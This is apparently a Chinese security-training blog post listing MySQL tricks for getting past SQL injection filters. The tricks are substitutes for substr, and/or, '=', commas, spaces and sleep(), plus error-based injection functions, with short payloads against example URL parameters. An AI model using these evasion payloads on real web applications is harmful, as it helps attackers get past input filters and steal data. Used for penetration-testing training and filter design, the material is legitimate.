mysql闭合符号被过滤_当注入函数被过滤时的Mysql注入小技巧

高质量的安全文章，安全offer面试经验分享

尽在 # 掌控安全EDU #

一、字符串截取函数

平时我们进行盲注时用substr()函数截取字符串，当substr()被过滤时，怎么办呢？我们可以用这些函数可以达到同样的效果

1.left(str, length)

从左边第length位开始截取字符串用法：left(str, length)，即：left(被截取字符串， 截取长度)

SELECT LEFT('www.baidu.com',8)

结果为：www.baid

2.right(str,length)

从右边第length位开始截取字符串用法：right(str, length)，即：left(被截取字符串， 截取长度)SELECT RIGHT('www.baidu.com',8)结果为：aidu.com

3.substring(str,index,len)

截取特定长度的字符串用法：substring(str, pos)，即：substring(被截取字符串，从第几位开始截取)substring(str, pos, length)，即：substring(被截取字符串，从第几位开始截取，截取长度)

(1).从字符串的第8个字符开始读取直至结束

SELECT SUBSTRING('www.baidu.com',8)结果为：du.com

(2).从字符串的第8个字符开始，只取3个字符

SELECT SUBSTRING('www.baidu.com',8,3)结果为：du.

4.mid(str,start,length)

截取str 从start开始,截取length的长度mid()的用法等同于substr()这里就不多赘述了

5.substring_index(str, delim, count)

按关键字进行读取用法：substring_index(str, delim, count)，即：substring_index(被截取字符串，关键字，关键字出现的次数)

(1).截取第二个“.”之前的所有字符

SELECT SUBSTRING_INDEX('www.baidu.com', '.', 2);结果：www.baidu

(2).截取倒数第二个“.”之后的所有字符

SELECT SUBSTRING_INDEX('www.baidu.com', '.', -2);结果：baidu.com3.如果关键字不存在，则返回整个字符串SELECT SUBSTRING_INDEX('www.baidu.com', 'zkaq', 1);结果: www.baidu.com

substring_index()可以在布尔盲注时使用，先随便截取一个不可能的值。那么页面肯定返回正常，如:and substring_index(database(),'qwasda',1)=database()'

6.Locate(substr,str)

返回字符串的位置用法1：

LOCATE(substr,str)返回字符串substr中第一次出现str的位置

例：返回字符串“d”自一次出现的位置SELECT locate("d",'www.baidu.com');结果：8

用法2：LOCATE(substr,str,pos)返回字符串substr中第一次出现str的位置，从第pos个位置开始例：从字符串”pan.baidu.com”的第三位开始计算，返回字符“a”第一次出现的位置SELECT locate("a",'pan.baidu.com',3);结果：6locate()还可以判断字符串长度select locate('m','m123456m',15);

7.instr (substr,str)

返回字符串的位置等同于locate()，但语法相反

用法：instr(substr,str)返回字符串substr中第一次出现str的位置例：返回字符串“d”自一次出现的位置SELECT instr('www.baidu.com',"d");结果：8

8.position (substr IN str)

position (substr IN str)的效果与instr()，locate()相同，但语法不同

用法：POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同例：返回字符串“d”自一次出现的位置SELECT position("d"in'www.baidu.com');结果：8

9.strcmp()

若所有的字符串均相同，则返回STRCMP()，若根据当前分类次序，第一个参数小于第二个，则返回-1，其它情况返回1用法：

mysql> SELECT STRCMP(12345,123456);

-> -1

mysql> SELECT STRCMP(1234567,123456);

-> 1

mysql> SELECT STRCMP(123456,123456);

-> 0

二、替代逻辑运算符

我们在注入时，用的最多的是什么？在测试是否有注入点时，经常会用到and 1=1, 如果and、等于号”=”等这些逻辑运算符被过滤无法使用时，我们是不是就此放弃了，这时候我们可以用一些特殊的符号替代

1.替代and

当and被过滤时，可以用”&&”替代Index.php?id = 1 and 1=1等同于Index.php?id = 1 && 1=1

2.替代or

当or被过滤时，可以用”||”替代Index.php?id = 1.1 or 1=1等同于Index.php?id = 1.1 || 1=1

3.替代异或运算符”^”

当异或运算符”^”被过滤时，可以用”XOR”替代select 1=1 XOR 1=1等同于select 1=1 ^ 1=1

4.替代等于号”=”

等于号”=”被过滤时，可以用多种方法替代(1) Between：//在什么与什么之间select database() between 0x61 and 0x7a;(2) in：// mysql中in常用于where表达式中，其作用是查询某个范围内的数据SELECT * FROM user WHERE uid IN (2,3,5)(3) Like //模糊查询，也可以当等于号用Index.php?id = 1.1 or 1 like 1等同于Index.php?id = 1.1 or1 like 1(4) 使用正则代替等于号SELECT ‘Hern’ REGEXP ‘[0-9]’;Rlike === regexpREGEXP等同于RLIKE

5.替代逗号”,”

union select 1,2,3 => union select * from (select 1)a join (select 2)b join (select 3)c;

6.替代空格

%20 %09 %0a %0b %0c %0d%a0/**/ tab/%a0 这个不会被php的\s进行匹配/*!/ 内敛注释# 这个也可以用来做分隔 挺有意思

7.替代NULL

\N => nullselect *from duomi_admin where id=\N

三、其他小技巧

1.替代sleep()

BENCHMARK(100000,SHA1(‘1’)), 1BENCHMARK函数是指执行某函数的次数，次数多时能够达到与sleep函数相同的效果

2.函数名和括号之间可以加入特殊字符

concat/**/()`version`()

3.花式报错注入

Floor()Updatexml() //5.1.5以上才能使用Extractvalue() //5.1.5以上才能使用Exp() //5.5.5后可以用Name_constgeometrycollection()，multipoint()，Polygon(),multipolygon()，linestring()，multilinestring() 几何函数报错

4.替代ascii

Hex()Bin()Ord()

回顾往期内容

扫码加助教老师

可领取免费的安全教程

还有免费的配套靶场、交流群哦！

点击在看~好文推荐大家一起看！👇